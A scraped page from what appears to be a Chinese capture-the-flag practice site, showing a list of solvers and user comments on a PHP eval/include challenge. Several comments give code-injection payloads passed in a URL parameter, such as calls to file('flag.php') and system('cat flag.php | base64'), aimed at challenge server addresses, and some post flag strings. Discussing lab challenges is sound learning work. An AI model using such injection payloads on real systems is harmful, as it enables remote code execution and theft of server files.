评分(9)
解题动态

kfdwty 攻破了该题 19小时前

z791458703 攻破了该题 1天前

buxixi 攻破了该题 1天前

1720713439 攻破了该题 1天前

shbshb123 攻破了该题 1天前

18075013015 攻破了该题 1天前

dkwang 攻破了该题 2天前

Gsparrow 攻破了该题 2天前

wenbojia 攻破了该题 3天前

DOMAKE 攻破了该题 3天前

别偷我后场 攻破了该题 3天前

Ta7suya 攻破了该题 3天前

liyuanchao 攻破了该题 3天前

qweQWERT 攻破了该题 3天前

咔咔 攻破了该题 3天前

lishenyuchen 攻破了该题 3天前

摇曳露营芝麻凛 攻破了该题 3天前

1745085539 攻破了该题 4天前

3287973822 攻破了该题 4天前

评论
hhthht 2年前
举报
flag{cea9de710e2926a7c49f12318caf3912}
ryan777 2年前
举报
根据题中出现的include函数,怀疑存在文件包含漏洞,后面再看题目的eval函数得知存在代码执行的漏洞,可以结合二者,将flag.php的信息获取传递给参数a的值进行代码执行输出flag。即?hello=file('flag.php')
AmazingForself 2年前
举报
看网站中出示的码可以看出是php文件包含题故按文件包含程序去做在URL栏输入?hello=file('flag.php')即可完成解答,详细有关文件包含可以参考:https://blog.csdn.net/qq_42181428/article/details/87090539
ryl123569 2年前
举报
?hello=file('flag,php') flag{a16626d75937389051135500053bcd36}
xiaobaiermei 2年前
举报
这里应该算的上是个文件包含吧
17leaf 2年前
举报
flag{4ccf17345bf8d8b3c5a6d005cf17e00a}
cap 2年前
举报
为啥我这样不行 ?hello=system("cat flag.php")
Restwlaq 2年前
举报
因为cat查看php的源码,经过var_dump还是字符串形式的代码,php中这样的代码还是被解析了,所以就看不到了。所以必须base64转一下,防止被执行。 ?hello=system(’cat flag.php | base64')
你的宝 2年前
举报
http://114.67.175.224:15626/?hello=file(%27flag.php%27)
15056775319 2年前
举报
http://114.67.175.224:17077/?hello=system('cat../../../../../../../../flag')
dodobird 2年前
举报
flag{6138fe804a171cd4cbfc9ea7cf1d1cd4}